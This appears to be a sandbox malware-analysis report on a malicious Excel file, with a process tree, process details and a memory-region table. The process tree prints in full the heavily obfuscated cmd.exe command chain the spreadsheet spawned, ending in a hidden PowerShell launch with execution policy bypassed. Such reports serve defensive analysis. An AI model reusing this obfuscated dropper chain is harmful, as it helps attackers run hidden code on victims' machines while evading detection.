4095b316...48ab

Process Overview

»

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x8f8	Analysis Target	Medium	excel.exe	"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"	-
#3	0xac0	Child Process	Medium	cmd.exe	CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^\|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^\|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^^?=^!^@^-^:^:^=^^!)&&( , , (^s^e^t ^#^;=^!^~^`^^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )	#1
#4	0xae0	Child Process	Medium	cmd.exe	C:\Windows\system32\cmd.exe /c ^f^t^Yp^e \| ^f^IN^d "SHCm"	#3
#5	0xae8	Child Process	Medium	cmd.exe	C:\Windows\system32\cmd.exe /S /D /c" ftYpe "	#4
#6	0xaf0	Child Process	Medium	find.exe	fINd "SHCm"	#4
#7	0xb04	Child Process	Medium	cmd.exe	Cmd , ; ; ; pPuxarv/VCsv40blbkn , cw8f/r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^\|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^^?=^!^@^-^:^:^=^^!)&&( , , (^s^e^t ^#^;=^!^~^`^^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )&&( , ( , (^s^e^t ^ ^ ^;^]=^!^'^}^_^-^:^j^U=^D^!) ) , )&( ; (^s^e^T ^ ^ ^`^\^+=^!^;^]^:^,^=^c^!) ; ; )&&( , ( , (S^e^T ^_^@^.^-=^!^`^\^+:^i^y^=^8^!) , , ) , , )&(^S^e^t ^ ^ ^ ^$^'=^	#3
#8	0xb24	Child Process	Medium	cmd.exe	C:\Windows\system32\cmd.exe /c ^ft^Y^p^e \| ^f^iN^d^S^t^r ^c^m	#7
#9	0xb2c	Child Process	Medium	cmd.exe	C:\Windows\system32\cmd.exe /S /D /c" ftYpe "	#8
#10	0xb34	Child Process	Medium	findstr.exe	fiNdStr cm	#8
#11	0xb3c	Child Process	Medium	cmd.exe	C:\Windows\system32\cmd.exe /S /D /c" echO ,%*[-,% "	#7
#12	0xb44	Child Process	Medium	cmd.exe	cmd ;	#7
#13	0xb4c	Child Process	Medium	cmd.exe	cmd.exE /c %adizY%	#12
#14	0xb54	Child Process	Medium	cmd.exe	C:\Windows\system32\cmd.exe /S /D /c" EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) "	#13
#15	0xb5c	Child Process	Medium	powershell.exe	POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd &( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT )	#13

Process #1: excel.exe

1665

0

»

Information	Value
ID	#1
File Name	c:\program files\microsoft office\root\office16\excel.exe
Command Line	"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:16, Reason: Analysis Target
Unmonitor	End Time: 00:04:57, Reason: Self Terminated
Monitor Duration	00:03:41

OS Process Information

»

Information	Value
PID	0x8f8
Parent PID	0x39c (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A38 0x A34 0x A30 0x A2C 0x 9A0 0x 99C 0x 998 0x 968 0x 964 0x 960 0x 95C 0x 958 0x 954 0x 950 0x 94C 0x 948 0x 944 0x 940 0x 93C 0x 938 0x 918 0x 914 0x 910 0x 90C 0x 908 0x 904 0x 900 0x 8FC 0x A3C 0x A40 0x A44 0x A48 0x A4C 0x A58 0x A5C 0x A60 0x A90 0x A9C 0x B2C 0x 5FC

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x00020fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rw	-
pagefile_0x00000000000e0000	0x000e0000	0x000e0fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000000f0000	0x000f0000	0x000f6fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000100000	0x00100000	0x00101fff	Pagefile Backed Memory	rw	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rw	-
private_0x0000000000120000	0x00120000	0x00120fff	Private Memory	rw	-
pagefile_0x0000000000130000	0x00130000	0x00132fff	Pagefile Backed Memory	r	-
private_0x0000000000140000	0x00140000	0x0014ffff	Private Memory	-	-
private_0x0000000000150000	0x00150000	0x0024ffff	Private Memory	rw	-
pagefile_0x0000000000250000	0x00250000	0x00252fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000260000	0x00260000	0x00262fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000270000	0x00270000	0x00272fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000280000	0x00280000	0x00282fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000290000	0x00290000	0x00292fff	Pagefile Backed Memory	r	-
pagefile_0x00000000002a0000	0x002a0000	0x002a1fff	Pagefile Backed Memory	r	-
pagefile_0x00000000002b0000	0x002b0000	0x002b1fff	Pagefile Backed Memory	r	-
private_0x00000000002c0000	0x002c0000	0x002c0fff	Private Memory	rw	-
pagefile_0x00000000002d0000	0x002d0000	0x002d0fff	Pagefile Backed Memory	r	-
private_0x00000000002e0000	0x002e0000	0x002effff	Private Memory	rw	-
private_0x00000000002f0000	0x002f0000	0x003effff	Private Memory	rw	-
private_0x00000000003f0000	0x003f0000	0x0042ffff	Private Memory	rw	-
private_0x0000000000430000	0x00430000	0x0052ffff	Private Memory	rw	-
pagefile_0x0000000000530000	0x00530000	0x006b7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000006c0000	0x006c0000	0x00840fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000850000	0x00850000	0x01c4ffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01c50000	0x01f1efff	Memory Mapped File	r	-
pagefile_0x0000000001f20000	0x01f20000	0x02312fff	Pagefile Backed Memory	r	-
private_0x0000000002320000	0x02320000	0x0241ffff	Private Memory	rw	-
pagefile_0x0000000002420000	0x02420000	0x02424fff	Pagefile Backed Memory	rw	-
private_0x0000000002430000	0x02430000	0x0243ffff	Private Memory	rw	-
private_0x0000000002440000	0x02440000	0x0263ffff	Private Memory	rw	-
pagefile_0x0000000002640000	0x02640000	0x0271efff	Pagefile Backed Memory	r	-
pagefile_0x0000000002720000	0x02720000	0x02720fff	Pagefile Backed Memory	r	-
pagefile_0x0000000002730000	0x02730000	0x02730fff	Pagefile Backed Memory	r	-
pagefile_0x0000000002740000	0x02740000	0x02740fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000002750000	0x02750000	0x02751fff	Pagefile Backed Memory	r	-
index.dat	0x02760000	0x0276bfff	Memory Mapped File	rw	-
index.dat	0x02770000	0x02777fff	Memory Mapped File	rw	-
private_0x0000000002780000	0x02780000	0x027fffff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028fffff	Private Memory	rw	-
index.dat	0x02900000	0x0290ffff	Memory Mapped File	rw	-
pagefile_0x0000000002910000	0x02910000	0x02910fff	Pagefile Backed Memory	r	-
private_0x0000000002920000	0x02920000	0x02920fff	Private Memory	rw	-
pagefile_0x0000000002930000	0x02930000	0x02931fff	Pagefile Backed Memory	r	-
private_0x0000000002940000	0x02940000	0x02940fff	Private Memory	rw	-
private_0x0000000002950000	0x02950000	0x0295ffff	Private Memory	rw	-
private_0x0000000002960000	0x02960000	0x02a5ffff	Private Memory	rw	-
private_0x0000000002a60000	0x02a60000	0x02a60fff	Private Memory	rw	-
private_0x0000000002a70000	0x02a70000	0x02a70fff	Private Memory	rw	-
private_0x0000000002a80000	0x02a80000	0x02a80fff	Private Memory	rw	-
private_0x0000000002a90000	0x02a90000	0x02b8ffff	Private Memory	rw	-
xlintl32.dll	0x02b90000	0x03bd7fff	Memory Mapped File	r	-
private_0x0000000003be0000	0x03be0000	0x03be0fff	Private Memory	rw	-
pagefile_0x0000000003bf0000	0x03bf0000	0x03bf0fff	Pagefile Backed Memory	r	-
private_0x0000000003c00000	0x03c00000	0x03c01fff	Private Memory	rw	-
private_0x0000000003c10000	0x03c10000	0x03c10fff	Private Memory	rw	-
pagefile_0x0000000003c20000	0x03c20000	0x03c21fff	Pagefile Backed Memory	r	-
private_0x0000000003c30000	0x03c30000	0x03c31fff	Private Memory	rw	-
private_0x0000000003c40000	0x03c40000	0x03d3ffff	Private Memory	rw	-
private_0x0000000003d40000	0x03d40000	0x03d40fff	Private Memory	rw	-
pagefile_0x0000000003d50000	0x03d50000	0x03d51fff	Pagefile Backed Memory	r	-
private_0x0000000003d60000	0x03d60000	0x03e5ffff	Private Memory	rw	-
cversions.2.db	0x03e60000	0x03e63fff	Memory Mapped File	r	-
cversions.2.db	0x03e70000	0x03e73fff	Memory Mapped File	r	-
pagefile_0x0000000003e80000	0x03e80000	0x03e81fff	Pagefile Backed Memory	r	-
pagefile_0x0000000003e90000	0x03e90000	0x03e90fff	Pagefile Backed Memory	r	-
comdlg32.dll.mui	0x03ea0000	0x03eacfff	Memory Mapped File	rw	-
pagefile_0x0000000003eb0000	0x03eb0000	0x03eb1fff	Pagefile Backed Memory	r	-
private_0x0000000003ec0000	0x03ec0000	0x03fbffff	Private Memory	rw	-
pagefile_0x0000000003fc0000	0x03fc0000	0x03fc1fff	Pagefile Backed Memory	r	-
private_0x0000000003fd0000	0x03fd0000	0x040cffff	Private Memory	rw	-
private_0x00000000040d0000	0x040d0000	0x041cffff	Private Memory	rw	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db	0x041d0000	0x041fffff	Memory Mapped File	r	-
pagefile_0x0000000004200000	0x04200000	0x04201fff	Pagefile Backed Memory	r	-
pagefile_0x0000000004210000	0x04210000	0x04211fff	Pagefile Backed Memory	r	-
private_0x0000000004220000	0x04220000	0x04222fff	Private Memory	rw	-
private_0x0000000004230000	0x04230000	0x04232fff	Private Memory	rw	-
private_0x0000000004240000	0x04240000	0x04240fff	Private Memory	rw	-
